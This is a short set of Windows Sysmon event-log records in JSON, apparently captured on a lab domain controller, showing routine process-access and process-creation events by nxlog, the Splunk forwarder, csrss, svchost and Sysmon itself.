{"EventTime":"2020-08-01 06:56:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6393,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:59.542\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:59.542","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6394,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:59.809\r\nProcessGuid: {E2A3D6B1-123B-5F25-0000-0010D13A0900}\r\nProcessId: 668\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:56:59.809","ProcessGuid":"{E2A3D6B1-123B-5F25-0000-0010D13A0900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:57:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6395,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:59.808\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-123B-5F25-0000-0010D13A0900}\r\nTargetProcessId: 668\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:59.808","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-123B-5F25-0000-0010D13A0900}","TargetProcessId":"668","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6396,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:59.808\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-123B-5F25-0000-0010D13A0900}\r\nTargetProcessId: 668\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:59.808","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-123B-5F25-0000-0010D13A0900}","TargetProcessId":"668","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:57:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6397,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:59.808\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:59.808","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6398,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:59.808\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:59.808","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6399,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:59.808\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:59.808","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6400,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:59.808\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:59.808","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
